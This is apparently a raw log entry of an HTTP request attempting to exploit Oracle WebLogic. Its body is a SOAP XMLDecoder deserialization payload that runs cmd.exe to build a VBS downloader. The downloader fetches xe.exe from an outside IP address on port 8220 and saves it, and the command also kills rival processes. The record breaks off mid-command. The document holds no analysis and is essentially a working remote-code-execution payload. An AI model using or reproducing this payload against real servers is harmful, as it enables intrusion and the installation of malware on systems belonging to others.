wls_vuln_attempt_67.231.243.10

Host:
Content-Length: 1745
Accept-Encoding: gzip, deflate, compress
X-Forwarded-For: 10.244.31.175
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Content-Type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
        <java version="1.8.0_131" class="java.beans.XMLDecoder">
          <void class="java.lang.ProcessBuilder">
            <array class="java.lang.String" length="3">
              <void index="0">
                <string>cmd</string>
              </void>
              <void index="1">
                <string>/c</string>
              </void>
              <void index="2">
                <string>echo Set xPost = CreateObject("Microsoft.XMLHTTP") > hu.vbs&@echo taskkill /IM iee.exe /f&@echo taskkill /IM 3.exe /f&@echo taskkill /IM 1e.exe /f&@echo taskkill /IM je.exe /f&@echo taskkill /IM iie.exe /f&@echo xPost.Open "GET","http://67.231.243.10:8220/xe.exe",0 >> hu.vbs&@echo xPost.Send() >> hu.vbs&@echo        Set sGet = CreateObject("ADODB.Stream") >> hu.vbs&@echo sGet.Mode = 3 >> hu.vbs&@echo sGet.Type = 1 >> hu.vbs&@echo sGet.Open() >>hu.vbs&@echo sGet.Write(xPost.responseBody) >>hu.vbs&@echo sGet.SaveToFile "xe.exe",2 >>hu.vbs&@cs